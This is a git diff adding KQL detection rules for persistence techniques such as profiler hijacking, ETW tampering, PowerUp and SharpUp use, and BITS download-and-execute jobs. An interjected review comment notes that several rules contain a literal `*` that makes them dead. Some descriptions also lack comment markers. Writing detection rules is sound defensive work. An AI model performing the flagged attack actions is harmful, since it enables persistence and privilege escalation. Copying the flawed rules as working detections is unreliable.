+// Author: Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research), Jimmy Bayne (@bohops)
+// Date: 2020-09-10
+// Level: medium
+// Description: Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.012
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\COR_ENABLE_PROFILING" or RegistryKey endswith "\\COR_PROFILER" or RegistryKey endswith "\\CORECLR_ENABLE_PROFILING") or RegistryKey contains "\\CORECLR_PROFILER_PATH"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/esxi_account_creation_via_esxcli.kql b/KQL/rules/Persistence/esxi_account_creation_via_esxcli.kql
new file mode 100644
index 00000000..0199040b
--- /dev/null
+++ b/KQL/rules/Persistence/esxi_account_creation_via_esxcli.kql
@@ -0,0 +1,12 @@
+// Title: ESXi Account Creation Via ESXCLI
+// Author: Cedric Maurugeon
+// Date: 2023-08-22
+// Level: medium
+// Description: Detects user account creation on ESXi system via esxcli
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.execution, attack.t1136, attack.t1059.012
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "system " and ProcessCommandLine contains "account " and ProcessCommandLine contains "add ") and FolderPath endswith "/esxcli"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/esxi_admin_permission_assigned_to_account_via_esxcli.kql b/KQL/rules/Persistence/esxi_admin_permission_assigned_to_account_via_esxcli.kql
new file mode 100644
index 00000000..e858882a
--- /dev/null
+++ b/KQL/rules/Persistence/esxi_admin_permission_assigned_to_account_via_esxcli.kql
@@ -0,0 +1,12 @@
+// Title: ESXi Admin Permission Assigned To Account Via ESXCLI
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-09-04
+// Level: high
+// Description: Detects execution of the "esxcli" command with the "system" and "permission" flags in order to assign admin permissions to an account.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.execution, attack.privilege-escalation, attack.t1059.012, attack.t1098
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "system" and (ProcessCommandLine contains " permission " and ProcessCommandLine contains " set" and ProcessCommandLine contains "Admin") and FolderPath endswith "/esxcli"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/etw_logging_disabled_for_rpcrt4_dll.kql b/KQL/rules/Persistence/etw_logging_disabled_for_rpcrt4_dll.kql
new file mode 100644
index 00000000..bb458995
--- /dev/null
+++ b/KQL/rules/Persistence/etw_logging_disabled_for_rpcrt4_dll.kql
@@ -0,0 +1,10 @@
+// Title: ETW Logging Disabled For rpcrt4.dll
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-09
+// Level: low
+// Description: Detects changes to the "ExtErrorInformation" key in order to disable ETW logging for rpcrt4.dll
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112, attack.t1562
+
+DeviceRegistryEvents
+| where (RegistryValueData in~ ("DWORD (0x00000000)", "DWORD (0x00000002)")) and RegistryKey endswith "\\Microsoft\\Windows NT\\Rpc\\ExtErrorInformation"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/etw_logging_disabled_for_scm.kql b/KQL/rules/Persistence/etw_logging_disabled_for_scm.kql
new file mode 100644
index 00000000..646cb83c
--- /dev/null
+++ b/KQL/rules/Persistence/etw_logging_disabled_for_scm.kql
@@ -0,0 +1,10 @@
+// Title: ETW Logging Disabled For SCM
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-09
+// Level: low
+// Description: Detects changes to the "TracingDisabled" key in order to disable ETW logging for services.exe (SCM)
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112, attack.t1562
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "Software\\Microsoft\\Windows NT\\CurrentVersion\\Tracing\\SCM\\Regular\\TracingDisabled"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/etw_logging_disabled_in_net_processes_sysmon_registry.kql b/KQL/rules/Persistence/etw_logging_disabled_in_net_processes_sysmon_registry.kql
new file mode 100644
index 00000000..11f646b7
--- /dev/null
+++ b/KQL/rules/Persistence/etw_logging_disabled_in_net_processes_sysmon_registry.kql
@@ -0,0 +1,10 @@
+// Title: ETW Logging Disabled In .NET Processes - Sysmon Registry
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-06-05
+// Level: high
+// Description: Potential adversaries stopping ETW providers recording loaded .NET assemblies.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112, attack.t1562
+
+DeviceRegistryEvents
+| where ((RegistryValueData in~ ("0", "DWORD (0x00000000)")) and (RegistryKey endswith "\\COMPlus_ETWEnabled" or RegistryKey endswith "\\COMPlus_ETWFlags")) or (RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "SOFTWARE\\Microsoft\\.NETFramework\\ETWEnabled")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/hacktool_powerup_write_hijack_dll.kql b/KQL/rules/Persistence/hacktool_powerup_write_hijack_dll.kql
new file mode 100644
index 00000000..540adb33
--- /dev/null
+++ b/KQL/rules/Persistence/hacktool_powerup_write_hijack_dll.kql
@@ -0,0 +1,15 @@
+// Title: HackTool - Powerup Write Hijack DLL
+// Author: Subhash Popuri (@pbssubhash)
+// Date: 2021-08-21
+// Level: high
+// Description: Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.
+In it's default mode, it builds a self deleting .bat file which executes malicious command.
+The detection rule relies on creation of the malicious bat file (debug.bat by default).
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.001
+// False Positives:
+// - Any powershell script that creates bat files
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and FolderPath endswith ".bat"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/hacktool_sharpup_privesc_tool_execution.kql b/KQL/rules/Persistence/hacktool_sharpup_privesc_tool_execution.kql
new file mode 100644
index 00000000..95869e63
--- /dev/null
+++ b/KQL/rules/Persistence/hacktool_sharpup_privesc_tool_execution.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - SharpUp PrivEsc Tool Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-08-20
+// Level: critical
+// Description: Detects the use of SharpUp, a tool for local privilege escalation
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.discovery, attack.execution, attack.t1615, attack.t1569.002, attack.t1574.005
+
+DeviceProcessEvents
+| where FolderPath endswith "\\SharpUp.exe" or ProcessVersionInfoFileDescription =~ "SharpUp" or (ProcessCommandLine contains "HijackablePaths" or ProcessCommandLine contains "UnquotedServicePath" or ProcessCommandLine contains "ProcessDLLHijack" or ProcessCommandLine contains "ModifiableServiceBinaries" or ProcessCommandLine contains "ModifiableScheduledTask" or ProcessCommandLine contains "DomainGPPPassword" or ProcessCommandLine contains "CachedGPPPassword")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/ie_change_domain_zone.kql b/KQL/rules/Persistence/ie_change_domain_zone.kql
new file mode 100644
index 00000000..e86cf1a3
--- /dev/null
+++ b/KQL/rules/Persistence/ie_change_domain_zone.kql
@@ -0,0 +1,12 @@
+// Title: IE Change Domain Zone
+// Author: frack113
+// Date: 2022-01-22
+// Level: medium
+// Description: Hides the file extension through modification of the registry
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1137
+// False Positives:
+// - Administrative scripts
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains*" and (not((RegistryValueData in~ ("DWORD (0x00000000)", "DWORD (0x00000001)", "(Empty)"))))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/iis_native_code_module_command_line_installation.kql b/KQL/rules/Persistence/iis_native_code_module_command_line_installation.kql
new file mode 100644
index 00000000..d0a062eb
--- /dev/null
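Review bot: The `RegistryKey endswith "...\\ZoneMap\\Domains*"` predicate in the IE Change Domain Zone rule treats the trailing `*` as a literal character — KQL `endswith` has no wildcard support — so it only matches keys whose name actually ends in an asterisk, and the rule is effectively dead. The wildcard was presumably meant as a subtree match; `RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\"` expresses that in KQL. The same literal `*` survives in `endswith "SYSTEM*"` in the NetNTLM downgrade rule (where it is and-ed with everything else, so that rule cannot fire either) and in `endswith "...\\BGInfo\\UserFields*"` in the two BgInfo UserFields rules further down, which suggests the converter passes Sigma wildcards through unescaped rather than mapping them to `contains`/`startswith`. Separately, the Description line `Hides the file extension through modification of the registry` does not describe this rule and appears to be carried over verbatim; a `// NOTE: description inherited from upstream rule, does not match the title` line would save the next reader a double-take.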
+++ b/KQL/rules/Persistence/iis_native_code_module_command_line_installation.kql
@@ -0,0 +1,12 @@
+// Title: IIS Native-Code Module Command Line Installation
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-12-11
+// Level: medium
+// Description: Detects suspicious IIS native-code module installations via command line
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1505.003
+// False Positives:
+// - Unknown as it may vary from organisation to organisation how admins use to install IIS modules
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains "install" and ProcessCommandLine contains "module") and (ProcessCommandLine contains "-name:" or ProcessCommandLine contains "/name:" or ProcessCommandLine contains "–name:" or ProcessCommandLine contains "—name:" or ProcessCommandLine contains "―name:")) and (FolderPath endswith "\\appcmd.exe" or ProcessVersionInfoOriginalFileName =~ "appcmd.exe")) and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\inetsrv\\iissetup.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/imports_registry_key_from_a_file.kql b/KQL/rules/Persistence/imports_registry_key_from_a_file.kql
new file mode 100644
index 00000000..d4244714
--- /dev/null
+++ b/KQL/rules/Persistence/imports_registry_key_from_a_file.kql
@@ -0,0 +1,13 @@
+// Title: Imports Registry Key From a File
+// Author: Oddvar Moe, Sander Wiebing, oscd.community
+// Date: 2020-10-07
+// Level: medium
+// Description: Detects the import of the specified file to the registry with regedit.exe.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1112, attack.defense-evasion
+// False Positives:
+// - Legitimate import of keys
+// - Evernote
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " /i " or ProcessCommandLine contains " /s " or ProcessCommandLine contains ".reg") and (FolderPath endswith "\\regedit.exe" or ProcessVersionInfoOriginalFileName =~ "REGEDIT.EXE")) and (not(((ProcessCommandLine contains " -e " or ProcessCommandLine contains " /e " or ProcessCommandLine contains " –e " or ProcessCommandLine contains " —e " or ProcessCommandLine contains " ―e " or ProcessCommandLine contains " -a " or ProcessCommandLine contains " /a " or ProcessCommandLine contains " –a " or ProcessCommandLine contains " —a " or ProcessCommandLine contains " ―a " or ProcessCommandLine contains " -c " or ProcessCommandLine contains " /c " or ProcessCommandLine contains " –c " or ProcessCommandLine contains " —c " or ProcessCommandLine contains " ―c ") and ProcessCommandLine matches regex ":[^ \\\\]")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/imports_registry_key_from_an_ads.kql b/KQL/rules/Persistence/imports_registry_key_from_an_ads.kql
new file mode 100644
index 00000000..dedf9ed8
--- /dev/null
+++ b/KQL/rules/Persistence/imports_registry_key_from_an_ads.kql
@@ -0,0 +1,10 @@
+// Title: Imports Registry Key From an ADS
+// Author: Oddvar Moe, Sander Wiebing, oscd.community
+// Date: 2020-10-12
+// Level: high
+// Description: Detects the import of a alternate datastream to the registry with regedit.exe.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1112, attack.defense-evasion
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains " /i " or ProcessCommandLine contains ".reg") and ProcessCommandLine matches regex ":[^ \\\\]") and (FolderPath endswith "\\regedit.exe" or ProcessVersionInfoOriginalFileName =~ "REGEDIT.EXE")) and (not((ProcessCommandLine contains " -e " or ProcessCommandLine contains " /e " or ProcessCommandLine contains " –e " or ProcessCommandLine contains " —e " or ProcessCommandLine contains " ―e " or ProcessCommandLine contains " -a " or ProcessCommandLine contains " /a " or ProcessCommandLine contains " –a " or ProcessCommandLine contains " —a " or ProcessCommandLine contains " ―a " or ProcessCommandLine contains " -c " or ProcessCommandLine contains " /c " or ProcessCommandLine contains " –c " or ProcessCommandLine contains " —c " or ProcessCommandLine contains " ―c ")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/interactive_at_job.kql b/KQL/rules/Persistence/interactive_at_job.kql
new file mode 100644
index 00000000..ac88ff8a
--- /dev/null
+++ b/KQL/rules/Persistence/interactive_at_job.kql
@@ -0,0 +1,12 @@
+// Title: Interactive AT Job
+// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
+// Date: 2019-10-24
+// Level: high
+// Description: Detects an interactive AT job, which may be used as a form of privilege escalation.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.execution, attack.privilege-escalation, attack.t1053.002
+// False Positives:
+// - Unlikely (at.exe deprecated as of Windows 8)
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "interactive" and FolderPath endswith "\\at.exe"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/linux_webshell_indicators.kql b/KQL/rules/Persistence/linux_webshell_indicators.kql
new file mode 100644
index 00000000..9fe9b890
--- /dev/null
+++ b/KQL/rules/Persistence/linux_webshell_indicators.kql
@@ -0,0 +1,12 @@
+// Title: Linux Webshell Indicators
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-10-15
+// Level: high
+// Description: Detects suspicious sub processes of web server processes
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1505.003
+// False Positives:
+// - Web applications that invoke Linux command line tools
+
+DeviceProcessEvents
+| where ((InitiatingProcessFolderPath endswith "/httpd" or InitiatingProcessFolderPath endswith "/lighttpd" or InitiatingProcessFolderPath endswith "/nginx" or InitiatingProcessFolderPath endswith "/apache2" or InitiatingProcessFolderPath endswith "/node" or InitiatingProcessFolderPath endswith "/caddy") or (InitiatingProcessCommandLine contains "/bin/java" and InitiatingProcessCommandLine contains "tomcat") or (InitiatingProcessCommandLine contains "/bin/java" and InitiatingProcessCommandLine contains "websphere")) and (FolderPath endswith "/whoami" or FolderPath endswith "/ifconfig" or FolderPath endswith "/ip" or FolderPath endswith "/bin/uname" or FolderPath endswith "/bin/cat" or FolderPath endswith "/bin/crontab" or FolderPath endswith "/hostname" or FolderPath endswith "/iptables" or FolderPath endswith "/netstat" or FolderPath endswith "/pwd" or FolderPath endswith "/route")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/macos_emond_launch_daemon.kql b/KQL/rules/Persistence/macos_emond_launch_daemon.kql
new file mode 100644
index 00000000..1d6c7e08
--- /dev/null
+++ b/KQL/rules/Persistence/macos_emond_launch_daemon.kql
@@ -0,0 +1,12 @@
+// Title: MacOS Emond Launch Daemon
+// Author: Alejandro Ortuno, oscd.community
+// Date: 2020-10-23
+// Level: medium
+// Description: Detects additions to the Emond Launch Daemon that adversaries may use to gain persistence and elevate privileges.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.014
+// False Positives:
+// - Legitimate administration activities
+
+DeviceFileEvents
+| where (FolderPath contains "/etc/emond.d/rules/" and FolderPath endswith ".plist") or FolderPath contains "/private/var/db/emondClients/"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/macro_enabled_in_a_potentially_suspicious_document.kql b/KQL/rules/Persistence/macro_enabled_in_a_potentially_suspicious_document.kql
new file mode 100644
index 00000000..7ed68386
--- /dev/null
+++ b/KQL/rules/Persistence/macro_enabled_in_a_potentially_suspicious_document.kql
@@ -0,0 +1,12 @@
+// Title: Macro Enabled In A Potentially Suspicious Document
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-21
+// Level: high
+// Description: Detects registry changes to Office trust records where the path is located in a potentially suspicious location
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where (RegistryKey contains "/AppData/Local/Microsoft/Windows/INetCache/" or RegistryKey contains "/AppData/Local/Temp/" or RegistryKey contains "/PerfLogs/" or RegistryKey contains "C:/Users/Public/" or RegistryKey contains "file:///D:/" or RegistryKey contains "file:///E:/") and RegistryKey contains "\\Security\\Trusted Documents\\TrustRecords"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/malicious_dll_file_dropped_in_the_teams_or_onedrive_folder.kql b/KQL/rules/Persistence/malicious_dll_file_dropped_in_the_teams_or_onedrive_folder.kql
new file mode 100644
index 00000000..1bd9aa24
--- /dev/null
+++ b/KQL/rules/Persistence/malicious_dll_file_dropped_in_the_teams_or_onedrive_folder.kql
@@ -0,0 +1,12 @@
+// Title: Malicious DLL File Dropped in the Teams or OneDrive Folder
+// Author: frack113
+// Date: 2022-08-12
+// Level: high
+// Description: Detects creation of a malicious DLL file in the location where the OneDrive or Team applications
+Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is sideloaded
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.001
+
+DeviceFileEvents
+| where FolderPath contains "iphlpapi.dll" and FolderPath contains "\\AppData\\Local\\Microsoft"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/mask_system_power_settings_via_systemctl.kql b/KQL/rules/Persistence/mask_system_power_settings_via_systemctl.kql
new file mode 100644
index 00000000..dc78d7b3
--- /dev/null
+++ b/KQL/rules/Persistence/mask_system_power_settings_via_systemctl.kql
@@ -0,0 +1,15 @@
+// Title: Mask System Power Settings Via Systemctl
+// Author: Milad Cheraghi, Nasreddine Bencherchali
+// Date: 2025-10-17
+// Level: high
+// Description: Detects the use of systemctl mask to disable system power management targets such as suspend, hibernate, or hybrid sleep.
+Adversaries may mask these targets to prevent a system from entering sleep or shutdown states, ensuring their malicious processes remain active and uninterrupted.
+This behavior can be associated with persistence or defense evasion, as it impairs normal system power operations to maintain long-term access or avoid termination of malicious activity.
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.impact, attack.t1653
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "suspend.target" or ProcessCommandLine contains "hibernate.target" or ProcessCommandLine contains "hybrid-sleep.target") and (ProcessCommandLine contains " mask" and FolderPath endswith "/systemctl")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/modification_of_ie_registry_settings.kql b/KQL/rules/Persistence/modification_of_ie_registry_settings.kql
new file mode 100644
index 00000000..911580fd
--- /dev/null
+++ b/KQL/rules/Persistence/modification_of_ie_registry_settings.kql
@@ -0,0 +1,10 @@
+// Title: Modification of IE Registry Settings
+// Author: frack113
+// Date: 2022-01-22
+// Level: low
+// Description: Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. An attacker can abuse this registry key to add a domain to the trusted sites Zone or insert JavaScript for persistence
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" and (not((RegistryValueData =~ "Binary Data" or RegistryValueData startswith "DWORD" or isnull(RegistryValueData) or (RegistryValueData in~ ("Cookie:", "Visited:", "(Empty)")) or (RegistryKey contains "\\Cache" or RegistryKey contains "\\ZoneMap" or RegistryKey contains "\\WpadDecision")))) and (not(RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Accepted Documents"))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/modify_user_shell_folders_startup_value.kql b/KQL/rules/Persistence/modify_user_shell_folders_startup_value.kql
new file mode 100644
index 00000000..d94ff684
--- /dev/null
+++ b/KQL/rules/Persistence/modify_user_shell_folders_startup_value.kql
@@ -0,0 +1,10 @@
+// Title: Modify User Shell Folders Startup Value
+// Author: frack113
+// Date: 2022-10-01
+// Level: high
+// Description: Detect modification of the startup key to a path where a payload could be stored to be launched during startup
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1547.001
+
+DeviceRegistryEvents
+| where RegistryKey contains "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders" and RegistryKey endswith "Startup"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/monitoring_for_persistence_via_bits.kql b/KQL/rules/Persistence/monitoring_for_persistence_via_bits.kql
new file mode 100644
index 00000000..d84ce3f5
--- /dev/null
+++ b/KQL/rules/Persistence/monitoring_for_persistence_via_bits.kql
@@ -0,0 +1,14 @@
+// Title: Monitoring For Persistence Via BITS
+// Author: Sreeman
+// Date: 2020-10-29
+// Level: medium
+// Description: BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished.
+When the job runs on the system the command specified in the BITS job will be executed.
+This can be abused by actors to create a backdoor within the system and for persistence.
+It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded.
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1197
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe") and ((ProcessCommandLine contains "/SetNotifyCmdLine" and (ProcessCommandLine contains "%COMSPEC%" or ProcessCommandLine contains "cmd.exe" or ProcessCommandLine contains "regsvr32.exe")) or (ProcessCommandLine contains "/Addfile" and (ProcessCommandLine contains "http:" or ProcessCommandLine contains "https:" or ProcessCommandLine contains "ftp:" or ProcessCommandLine contains "ftps:")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/msexchange_transport_agent_installation.kql b/KQL/rules/Persistence/msexchange_transport_agent_installation.kql
new file mode 100644
index 00000000..021db9d8
--- /dev/null
+++ b/KQL/rules/Persistence/msexchange_transport_agent_installation.kql
@@ -0,0 +1,12 @@
+// Title: MSExchange Transport Agent Installation
+// Author: Tobias Michalski (Nextron Systems)
+// Date: 2021-06-08
+// Level: medium
+// Description: Detects the Installation of a Exchange Transport Agent
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1505.002
+// False Positives:
+// - Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "Install-TransportAgent"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/net_ngenassemblyusagelog_registry_key_tamper.kql b/KQL/rules/Persistence/net_ngenassemblyusagelog_registry_key_tamper.kql
new file mode 100644
index 00000000..1843453b
--- /dev/null
+++ b/KQL/rules/Persistence/net_ngenassemblyusagelog_registry_key_tamper.kql
@@ -0,0 +1,13 @@
+// Title: NET NGenAssemblyUsageLog Registry Key Tamper
+// Author: frack113
+// Date: 2022-11-18
+// Level: high
+// Description: Detects changes to the NGenAssemblyUsageLog registry key.
+.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).
+By simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
+| where RegistryKey endswith "SOFTWARE\\Microsoft\\.NETFramework\\NGenAssemblyUsageLog"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/netntlm_downgrade_attack_registry.kql b/KQL/rules/Persistence/netntlm_downgrade_attack_registry.kql
new file mode 100644
index 00000000..3fd74516
--- /dev/null
+++ b/KQL/rules/Persistence/netntlm_downgrade_attack_registry.kql
@@ -0,0 +1,12 @@
+// Title: NetNTLM Downgrade Attack - Registry
+// Author: Florian Roth (Nextron Systems), wagga, Nasreddine Bencherchali (Splunk STRT)
+// Date: 2018-03-20
+// Level: high
+// Description: Detects NetNTLM downgrade attack
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1562.001, attack.t1112
+// False Positives:
+// - Services or tools that set the values to more restrictive values
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "SYSTEM*" and RegistryKey contains "ControlSet" and RegistryKey contains "\\Control\\Lsa") and (((RegistryValueData in~ ("DWORD (0x00000000)", "DWORD (0x00000001)", "DWORD (0x00000002)")) and RegistryKey endswith "\\lmcompatibilitylevel") or ((RegistryValueData in~ ("DWORD (0x00000000)", "DWORD (0x00000010)", "DWORD (0x00000020)", "DWORD (0x00000030)")) and RegistryKey endswith "\\NtlmMinClientSec") or RegistryKey endswith "\\RestrictSendingNTLMTraffic")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/new_bginfo_exe_custom_db_path_registry_configuration.kql b/KQL/rules/Persistence/new_bginfo_exe_custom_db_path_registry_configuration.kql
new file mode 100644
index 00000000..470e3da8
--- /dev/null
+++ b/KQL/rules/Persistence/new_bginfo_exe_custom_db_path_registry_configuration.kql
@@ -0,0 +1,12 @@
+// Title: New BgInfo.EXE Custom DB Path Registry Configuration
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-16
+// Level: medium
+// Description: Detects setting of a new registry database value related to BgInfo configuration. Attackers can for example set this value to save the results of the commands executed by BgInfo in order to exfiltrate information.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+// - Legitimate use of external DB to save the results
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Software\\Winternals\\BGInfo\\Database"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/new_bginfo_exe_custom_vbscript_registry_configuration.kql b/KQL/rules/Persistence/new_bginfo_exe_custom_vbscript_registry_configuration.kql
new file mode 100644
index 00000000..1b5c6e76
--- /dev/null
+++ b/KQL/rules/Persistence/new_bginfo_exe_custom_vbscript_registry_configuration.kql
@@ -0,0 +1,12 @@
+// Title: New BgInfo.EXE Custom VBScript Registry Configuration
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-16
+// Level: medium
+// Description: Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom VBScript via "BgInfo.exe"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+// - Legitimate VBScript
+
+DeviceRegistryEvents
+| where RegistryValueData startswith "4" and RegistryKey endswith "\\Software\\Winternals\\BGInfo\\UserFields*"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/new_bginfo_exe_custom_wmi_query_registry_configuration.kql b/KQL/rules/Persistence/new_bginfo_exe_custom_wmi_query_registry_configuration.kql
new file mode 100644
index 00000000..0de9fa9b
--- /dev/null
+++ b/KQL/rules/Persistence/new_bginfo_exe_custom_wmi_query_registry_configuration.kql
@@ -0,0 +1,12 @@
+// Title: New BgInfo.EXE Custom WMI Query Registry Configuration
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-16
+// Level: medium
+// Description: Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom WMI query via "BgInfo.exe"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+// - Legitimate WMI query
+
+DeviceRegistryEvents
+| where RegistryValueData startswith "6" and RegistryKey endswith "\\Software\\Winternals\\BGInfo\\UserFields*"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/new_kernel_driver_via_sc_exe.kql b/KQL/rules/Persistence/new_kernel_driver_via_sc_exe.kql
new file mode 100644
index 00000000..8ecf6644
--- /dev/null
+++ b/KQL/rules/Persistence/new_kernel_driver_via_sc_exe.kql
@@ -0,0 +1,12 @@
+// Title: New Kernel Driver Via SC.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-14
+// Level: medium
+// Description: Detects creation of a new service (kernel driver) with the type "kernel"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003
+// False Positives:
+// - Rare legitimate installation of kernel drivers via sc.exe
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "create" or ProcessCommandLine contains "config") and (ProcessCommandLine contains "binPath" and ProcessCommandLine contains "type" and ProcessCommandLine contains "kernel") and FolderPath endswith "\\sc.exe") and (not(((ProcessCommandLine contains "create netprotection_network_filter" and ProcessCommandLine contains "type= kernel start= " and ProcessCommandLine contains "binPath= System32\\drivers\\netprotection_network_filter" and ProcessCommandLine contains "DisplayName= netprotection_network_filter" and ProcessCommandLine contains "group= PNP_TDI tag= yes") or (ProcessCommandLine contains "create avelam binpath=C:\\Windows\\system32\\drivers\\avelam.sys" and ProcessCommandLine contains "type=kernel start=boot error=critical group=Early-Launch"))))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/new_odbc_driver_registered.kql b/KQL/rules/Persistence/new_odbc_driver_registered.kql
new file mode 100644
index 00000000..e2ff7413
--- /dev/null
+++ b/KQL/rules/Persistence/new_odbc_driver_registered.kql
